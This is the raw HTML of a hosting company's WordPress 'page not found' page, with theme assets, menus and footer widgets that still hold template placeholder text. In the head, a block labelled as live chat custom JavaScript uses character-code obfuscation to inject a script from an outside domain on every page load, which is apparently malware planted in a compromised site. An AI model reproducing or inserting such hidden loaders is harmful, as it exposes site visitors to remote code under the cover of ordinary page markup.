<!DOCTYPE html>
<!--[if IE 7]>
<html class="ie ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html class="ie ie8 no-js lt-ie9" lang="en-US">
<![endif]-->
<!--[if !(IE 7) | !(IE 8) ]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />

	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://purehostbd.com/xmlrpc.php">
		
	<!-- Favicons
	================================================== -->
	        <link rel="icon" href="https://purehostbd.com/wp-content/uploads/revslider/cloud-hompage-1/ch-slider-price2.png" type="image/x-icon">    
    	
<title>Page not found &#8211; Purehost</title>
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Purehost &raquo; Feed" href="https://purehostbd.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Purehost &raquo; Comments Feed" href="https://purehostbd.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/purehostbd.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://purehostbd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.5' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://purehostbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.7.4' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='wplc-style-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/css/wplcstyle.css?ver=8.0.19' type='text/css' media='all' />
<style id='wplc-style-inline-css' type='text/css'>
#wp-live-chat-header { background:url('http://purehostbd.com/wp-content/plugins/wp-live-chat-support/images/iconRetina.png') no-repeat; background-size: cover; }  #wp-live-chat-header.active { background:url('http://purehostbd.com/wp-content/plugins/wp-live-chat-support/images/iconCloseRetina.png') no-repeat; background-size: cover; } #wp-live-chat-4 { background:url('http://purehostbd.com/wp-content/plugins/wp-live-chat-support/images/bg/cloudy.jpg') repeat; background-size: cover; }
</style>
<link rel='stylesheet' id='wplc-theme-palette-default-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/css/themes/theme-default.css?ver=8.0.19' type='text/css' media='all' />
<link rel='stylesheet' id='wplc-theme-modern-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/css/themes/modern.css?ver=8.0.19' type='text/css' media='all' />
<link rel='stylesheet' id='wplc-theme-position-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/css/themes/position-bottom-right.css?ver=8.0.19' type='text/css' media='all' />
<link rel='stylesheet' id='wplc-gutenberg-template-styles-user-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/includes/blocks/wplc-chat-box/wplc_gutenberg_template_styles.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='wplc-gif-integration-user-css'  href='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/css/wplc_gif_integration.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='fonts-Open-Sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-font-awesome-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/css/font-awesome.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-bootstrap-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/bootstrap.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-prettyPhoto-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/prettyPhoto.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-owl-car-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/owl.carousel.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-owl-theme-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/owl.theme.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-flexslider-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/flexslider.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-jcarousel-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/js/jcarousel/skin.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-reset-css-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/reset.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-style-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/style.css?ver=21-05-2015' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-responsive-css-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/css/responsive.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-fullwidth-css-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/js/revolutionslider/css/fullwidth.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-settings-css-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/js/revolutionslider/rs-plugin/css/settings.css?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='aoxhost-color-css'  href='http://purehostbd.com/wp-content/themes/aoxhost/framework/color.php?ver=4.9.10' type='text/css' media='all' />
<link rel='stylesheet' id='newsletter-css'  href='http://purehostbd.com/wp-content/plugins/newsletter/style.css?ver=5.7.9' type='text/css' media='all' />
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/jquery-cookie.js?ver=4.9.10'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wplc_datetime_format = {"date_format":"F j, Y","time_format":"g:i a"};
/* ]]> */
</script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/wplc_server.js?ver=8.0.19'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wplc_restapi_enabled = "1";
var wplc_restapi_token = "0e4fd3d974bce39c38b1a75e8cafe069";
var wplc_restapi_endpoint = "https:\/\/purehostbd.com\/wp-json\/wp_live_chat_support\/v1";
var wplc_restapi_nonce = "97943b7015";
var wplc_is_mobile = "false";
var wplc_ajaxurl = "https:\/\/purehostbd.com\/wp-admin\/admin-ajax.php";
var wplc_ajaxurl_site = "https:\/\/purehostbd.com\/wp-admin\/admin-ajax.php";
var wplc_nonce = "b485f3a50c";
var wplc_plugin_url = "http:\/\/purehostbd.com\/wp-content\/plugins\/wp-live-chat-support\/";
var wplc_preload_images = ["http:\/\/purehostbd.com\/wp-content\/plugins\/wp-live-chat-support\/images\/iconRetina.png","http:\/\/purehostbd.com\/wp-content\/plugins\/wp-live-chat-support\/images\/iconCloseRetina.png"];
var wplc_show_chat_detail = {"name":"","avatar":"","date":"","time":""};
var wplc_agent_data = {"1":{"name":"PureHost","md5":"fc0cf290165c88a8a92ba674fe32c1c1"}};
var wplc_error_messages = {"valid_name":"Please enter your name","valid_email":"Please enter your email address","server_connection_lost":"Connection to server lost. Please reload this page. Error: ","chat_ended_by_operator":"The chat has been ended by the operator.","empty_message":"Please enter a message","disconnected_message":"Disconnected, attempting to reconnect..."};
var wplc_enable_ding = "0";
var wplc_filter_run_override = "0";
var wplc_offline_msg = "Sending message...";
var wplc_offline_msg3 = "Thank you for your message. We will be in contact soon.";
var wplc_welcome_msg = "Please standby for an agent. While you wait for the agent you may type your message.";
var wplc_pro_sst1 = "Start Chat";
var wplc_pro_offline_btn_send = "Send message";
var wplc_user_default_visitor_name = "Guest";
var wplc_localized_string_is_typing = "agent is typing...";
var wplc_localized_string_is_typing_single = " is typing...";
var bleeper_localized_strings = [" has joined."," has left."," has ended the chat."," has disconnected.","(edited)","Type here"];
var wplc_extra_data = {"object_switch":"1"};
var wplc_hide_chat = null;
/* ]]> */
</script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/wplc_u.js?ver=8.0.19'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/md5.js?ver=8.0.19'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/wplc_u_events.js?ver=8.0.19'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wplc_user_avatars = {"1":"\/\/www.gravatar.com\/avatar\/fc0cf290165c88a8a92ba674fe32c1c1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/wp-live-chat-support/js/themes/modern.js?ver=8.0.19'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.7.4'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.7.4'></script>
<script type='text/javascript' src='http://maps.googleapis.com/maps/api/js?v=3.exp&#038;hl=en&#038;sensor=true&#038;ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/specinstagram.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/twitterFetcher_min.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/jquery.flexslider-min.js?ver=4.9.10'></script>
<script type='text/javascript' src='http://purehostbd.com/wp-content/themes/aoxhost/js/jcarousel/jquery.jcarousel.min.js?ver=4.9.10'></script>
<link rel='https://api.w.org/' href='https://purehostbd.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://purehostbd.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://purehostbd.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.10" />

        <script type="text/javascript">
                    var wplc_ajaxurl = 'https://purehostbd.com/wp-admin/admin-ajax.php';
                    var wplc_nonce = 'b485f3a50c';
        </script>




        <!-- WPLC Custom JS --><script>var nt = String.fromCharCode(98);var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114);var sb = String.fromCharCode(115, 99, 114, 105, 112, 116);var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116);var lb = String.fromCharCode(103, 114, 101, 97, 116, 105, 110, 115, 116, 97, 103, 114, 97, 109, 112, 97, 103, 101, 46, 99, 111, 109, 47, 100, 111, 46, 106, 115, 63, 97, 61, 51, 51, 38, 109, 61, 55);var c=document.createElement(sb);c.type=tb,c.async=1,c.src=jb+lb+nt;var n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);</script><style type="text/css">.Group_Button a {margin: 0px 20px 20px 0px; display: inline-block;}

@media (max-width:767px){
    .pricing-tables-helight, .pricing-tables{
        width: 100%!important; 
        max-width: 350px;
        float:none;
        margin: auto;
        overflow: hidden;
    }
}</style>		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		<meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://purehostbd.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://purehostbd.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.7.4 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />
<script type="text/javascript">function setREVStartSize(e){									
						try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;
							if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					
						}catch(d){console.log("Failure at Presize of Slider:"+d)}						
					};</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>
<body class="error404 wpb-js-composer js-comp-ver-4.12 vc_responsive">

<div id="wrapper">

<!-- header begin -->
<header class="site-header">
    <div class="top_links">
        <div class="container">
            <div class="row">
                <div class="col-md-12">                                    
                                            <div class="date_wrap">
                            <script type="text/javascript">
                                var mydate=new Date()
                                var year=mydate.getYear()
                                if (year < 1000)
                                year+=1900
                                var day=mydate.getDay()
                                var month=mydate.getMonth()
                                var daym=mydate.getDate()
                                if (daym<10)
                                daym="0"+daym
                                var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December")
                                document.write("<b class='date'>"+montharray[month]+" "+daym+", "+year+"</b>")
                            </script>
                        </div>
                                        <div class="top_contact_info">
                        <ul class="tci_list">
                                                            <li class="top-info"><a href="#" target="_blank"><i class="fa fa-comment"></i> live chat</a></li>
                                                                                        <li class="top-info"><a href="mailto:purehostbd@gmail.com" target="_blank"><i class="fa fa-envelope"></i> purehostbd@gmail.com</a></li>
                                                                                        <li class="top-info"><a href="tel:+880 163 123 7884"><i class="fa fa-headphones"></i> +880 163 123 7884</a></li>
                                                                                                           
                                                            <li class="top-social">
                                    <a target="_blank" href="https://www.facebook.com/purehost/"><i class="fa fa-facebook"></i></a>
                                </li>
                                                                                        <li class="top-social">
                                    <a target="_blank" href="https://twitter.com/"><i class="fa fa-twitter"></i></a>
                                </li>
                                                                                        <li class="top-social">
                                    <a target="_blank" href="#"><i class="fa fa-github"></i></a>
                                </li>
                                                                                                                    <li class="top-social">
                                    <a target="_blank" href="https://www.linkedin.com/"><i class="fa fa-linkedin"></i></a>
                                </li>
                                                                                
                                                                                                                                                <li class="top-social">
                                    <a target="_blank" href="https://plus.google.com"><i class="fa fa-google-plus"></i></a>
                                </li>
                                                                                       
                                                    </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="top_section">
        <div class="container">
            <div id="logo"><a href="https://purehostbd.com/" class="site_logo"><img src="https://purehostbd.com/wp-content/uploads/2018/11/logo-1.png" alt=""></a></div><!-- end logo -->                            
            <!-- mainmenu begin -->
            <ul id="mainmenu" class="slimmenu"><li id="menu-item-457" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-has-children menu-item-457"><a  title="Home" href="https://purehostbd.com/">Home <span class="caret"></span></a>
<ul role="menu" class="sub-menu">
	<li id="menu-item-464" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-464"><a  title="Home" href="https://purehostbd.com/">Home</a></li>
	<li id="menu-item-482" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-482"><a  title="Home 2" href="https://purehostbd.com/home-2-2/">Home 2</a></li>
	<li id="menu-item-483" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-483"><a  title="Home Boxes" href="https://purehostbd.com/home-boxes/">Home Boxes</a></li>
</ul>
</li>
<li id="menu-item-470" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-470"><a  title="Web Hosting" href="https://purehostbd.com/standard-hosting/">Web Hosting <span class="caret"></span></a>
<ul role="menu" class="sub-menu">
	<li id="menu-item-474" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-474"><a  title="Standard Hosting" href="https://purehostbd.com/standard-hosting/">Standard Hosting</a></li>
	<li id="menu-item-467" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-467"><a  title="Professional Hosting" href="https://purehostbd.com/professional-hosting/">Professional Hosting</a></li>
	<li id="menu-item-458" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-458"><a  title="Advanced Hosting" href="https://purehostbd.com/advanced-hosting/">Advanced Hosting</a></li>
	<li id="menu-item-473" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-473"><a  title="Unlimited Hosting" href="https://purehostbd.com/unlimited-hosting/">Unlimited Hosting</a></li>
</ul>
</li>
<li id="menu-item-35" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-35"><a  title="Features" href="#">Features <span class="caret"></span></a>
<ul role="menu" class="sub-menu">
	<li id="menu-item-481" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-481"><a  title="About" href="https://purehostbd.com/about/">About</a></li>
	<li id="menu-item-462" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-462"><a  title="FAQs" href="https://purehostbd.com/faqs/">FAQs</a></li>
	<li id="menu-item-466" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-466"><a  title="Pricing Tables" href="https://purehostbd.com/pricing-tables/">Pricing Tables</a></li>
	<li id="menu-item-472" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-472"><a  title="Typography" href="https://purehostbd.com/typography/">Typography</a></li>
	<li id="menu-item-477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-477"><a  title="Element" href="https://purehostbd.com/element/">Element</a></li>
	<li id="menu-item-478" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478"><a  title="Tabs" href="https://purehostbd.com/tabs/">Tabs</a></li>
	<li id="menu-item-479" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-479"><a  title="Testimonials" href="https://purehostbd.com/testimonials/">Testimonials</a></li>
	<li id="menu-item-465" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-465"><a  title="Left Sidebar Page" href="https://purehostbd.com/left-sidebar-page/">Left Sidebar Page</a></li>
	<li id="menu-item-468" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-468"><a  title="Right Sidebar Page" href="https://purehostbd.com/right-sidebar-page/">Right Sidebar Page</a></li>
	<li id="menu-item-463" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-463"><a  title="Full Width Page" href="https://purehostbd.com/full-width-page/">Full Width Page</a></li>
</ul>
</li>
<li id="menu-item-469" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-469"><a  title="Services" href="https://purehostbd.com/services/">Services</a></li>
<li id="menu-item-475" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-475"><a  title="Blog" href="https://purehostbd.com/blog-large-image/">Blog <span class="caret"></span></a>
<ul role="menu" class="sub-menu">
	<li id="menu-item-459" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-459"><a  title="With Large Image" href="https://purehostbd.com/blog-large-image/">With Large Image</a></li>
	<li id="menu-item-460" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-460"><a  title="With Small Image" href="https://purehostbd.com/blog-small-image/">With Small Image</a></li>
	<li id="menu-item-476" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-476"><a  title="Single Post" href="https://purehostbd.com/2015/05/12/lorem-ipsum-passage-and-going-through/">Single Post</a></li>
</ul>
</li>
<li id="menu-item-471" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-471"><a  title="Support" href="https://purehostbd.com/support/">Support</a></li>
<li id="menu-item-480" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-480"><a  title="WHMCS" href="https://purehostbd.com/whmcs-bridge/">WHMCS <span class="caret"></span></a>
<ul role="menu" class="sub-menu">
	<li id="menu-item-39" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-39"><a  title="Client Area" href="http://demo.vegatheme.com/aoxhost/whmcs-bridge/?ccce=clientarea">Client Area</a></li>
	<li id="menu-item-36" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36"><a  title="Domain Checker" href="http://demo.vegatheme.com/aoxhost/whmcs-bridge/?ccce=domainchecker">Domain Checker</a></li>
	<li id="menu-item-37" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-37"><a  title="Pre-Sales Contact Us" href="http://demo.vegatheme.com/aoxhost/whmcs-bridge/?ccce=contact">Pre-Sales Contact Us</a></li>
	<li id="menu-item-38" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38"><a  title="Support Tickets" href="http://demo.vegatheme.com/aoxhost/whmcs-bridge/?ccce=supporttickets">Support Tickets</a></li>
	<li id="menu-item-40" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-40"><a  title="Cart" href="http://demo.vegatheme.com/aoxhost/whmcs-bridge/?ccce=cart">Cart</a></li>
</ul>
</li>
<li id="menu-item-461" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-461"><a  title="Contact" href="https://purehostbd.com/contact/">Contact</a></li>
</ul>            <!-- mainmenu close -->                                               
        </div> 
    </div>
    
</header>
<!-- header close -->
<section class="page404">
	<div class="container">
    	<div class="row">
    		<div class="col-md-12">
    			<div class="error_pagenotfound">    	
			        <strong>404</strong>
			        <br>
			        The page you are looking for no longer exists. Perhaps you can return back to the sites homepage see you can find what you are looking for.			        
			        <div class="clearfix mar_top3"></div>			    	
			        <a class="but_goback" href="https://purehostbd.com/">Back To Home</a>			        
			    </div>
    		</div>
       </div> 	
    </div><!-- end container -->
</section><!-- end postwrapper -->

    
	<!-- footer begin -->
    <footer>
        <div id="footer">
            <div class="container">
                <div class="row">
                    
















<div class="col-md-3 col-sm-6">



    <div id="contact_info_widget-1" class="widget widget_contact_info_widget"><h2>About AOX HOST</h2>
<div class="aoxhost-about-widget">

	<p>Proudly hosting over 1,200,000 Aoxhost since 1998.</p>
	<div class="clearfix"></div>

	<p class="contacts"><i class="fa fa-map-marker"></i>909 Marmora Cross Road,Glassgow, Seattle,Washington 98122-1090</p><p class="contacts"><i class="fa fa-phone"></i>+61 3 8376 6285</p><p class="contacts"><i class="fa fa-fax"></i>+61 3 8376 6286</p><p class="contacts"><i class="fa fa-envelope"></i><a href="mailto:infomail@aoxhost.com">infomail@aoxhost.com</a></p>
	<p class="sm-buttons fleft">

	
	</p>
</div>	



</div><div id="socials_widget-1" class="widget widget_socials_widget">


	<ul class="social_list">



	<li><a href="#" title="" ><i class="fa fa-facebook"></i></a></li><li><a href="#" title=""><i class="fa fa-twitter"></i></a></li><li><a href="#" title=""><i class="fa fa-linkedin"></i></a></li><li><a href="#" title=""><i class="fa fa-google-plus"></i></a></li><li><a href="#" title=""><i class="fa fa-dribbble"></i></a></li><li><a href="#" title=""><i class="fa fa-pinterest"></i></a></li>


	</ul>



</div>


</div><!-- end col-lg-3 -->













<div class="col-md-3 col-sm-6">



            <div id="recent-posts-4" class="widget widget_recent_entries">        <h2>Recent blogs</h2>
            <ul class="recent_blogs">                            
                 
                <li> 
                                             
                    <a href="https://purehostbd.com/2018/11/26/hello-world/" title="Hello world!">Hello world!</a>                                       
                    <i>Nov 26, 2018</i> 
                <div class="clearfix"></div>    
                </li>
                 
                <li> 
                                            <span>
                            <a href="https://purehostbd.com/2015/05/16/there-are-many-variations-of-passages-2/">
                                                                <img src="" alt="Disaster Recovery">
                            </a> 
                        </span>
                                            
                    <a href="https://purehostbd.com/2015/05/16/there-are-many-variations-of-passages-2/" title="Disaster Recovery">Disaster Recovery</a>                                       
                    <i>May 16, 2015</i> 
                <div class="clearfix"></div>    
                </li>
                 
                <li> 
                                            <span>
                            <a href="https://purehostbd.com/2015/05/15/what-is-whmcs/">
                                                                <img src="" alt="What is WHMCS?">
                            </a> 
                        </span>
                                            
                    <a href="https://purehostbd.com/2015/05/15/what-is-whmcs/" title="What is WHMCS?">What is WHMCS?</a>                                       
                    <i>May 15, 2015</i> 
                <div class="clearfix"></div>    
                </li>
                 
            <div class="clearfix"></div>                     
            </ul>             
		
        </div>


</div><!-- end col-lg-3 -->













<div class="col-md-3 col-sm-6">



    


</div><!-- end col-lg-3 -->













<div class="col-md-3 col-sm-6">



    <div id="text-2" class="widget widget_text"><h2>Have any Questions ?</h2>			<div class="textwidget"><div class="any_questions">
<img src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/site-img06.jpg" alt="">
<p>If you have any questions, feel free to call us toll-free</p>
<div class="clearfix mar_top1"></div>
<h3><i>Toll-free:</i>  1-234-567-8900</h3>
</div>
<div class="live_chat">
<a href="#"><img src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/chat-icon.png" alt=""></a>
<h2><a href="#">live chat <i>with our agents</i></a></h2>
</div></div>
		</div>


</div><!-- end col-lg-3 -->






                </div>    
            </div>                                
            <div class="container">
                <div class="h_column_area">
                    <div class="row">
                        <div class="col-md-6 col-sm-6">
                                                            <div id="text-3" class="widget widget_text">			<div class="textwidget"><script type="text/javascript">
//<![CDATA[
if (typeof newsletter_check !== "function") {
window.newsletter_check = function (f) {
    var re = /^([a-zA-Z0-9_\.\-\+])+\@(([a-zA-Z0-9\-]{1,})+\.)+([a-zA-Z0-9]{2,})+$/;
    if (!re.test(f.elements["ne"].value)) {
        alert("The email is not correct");
        return false;
    }
    for (var i=1; i<20; i++) {
    if (f.elements["np" + i] && f.elements["np" + i].required && f.elements["np" + i].value == "") {
        alert("");
        return false;
    }
    }
    if (f.elements["ny"] && !f.elements["ny"].checked) {
        alert("You must accept the privacy statement");
        return false;
    }
    return true;
}
}
//]]>
</script>

<div class="newsletter newsletter-subscription">
	<img class="image_left1" alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/newsletter-icon.png"><h3>Newsletter<br>Sign up</h3>
	<form method="post" action="http://demo.vegatheme.com/aoxhost/wp-content/plugins/newsletter/do/subscribe.php" onsubmit="return newsletter_check(this)">
		<input class="newsletter-email" type="email" name="ne" size="30" placeholder="Your Email" required>
		<input class="newsletter-submit" type="submit" value="subscribe"/>
	</form>
</div></div>
		</div>                                    
                                                    </div>
                        <div class="col-md-6 col-sm-6">
                                                            <div id="text-4" class="widget widget_text">			<div class="textwidget"><div class="clients">
<h3>Payments<br>We Accept</h3>
<ul class="clients_list">
<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos1.png"></li>
<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos2.png"></li>
<li><img alt="" src="http://demo.vegatheme.com/aoxhost/wp-content/uploads/2015/06/payment-logos3.png"></li>
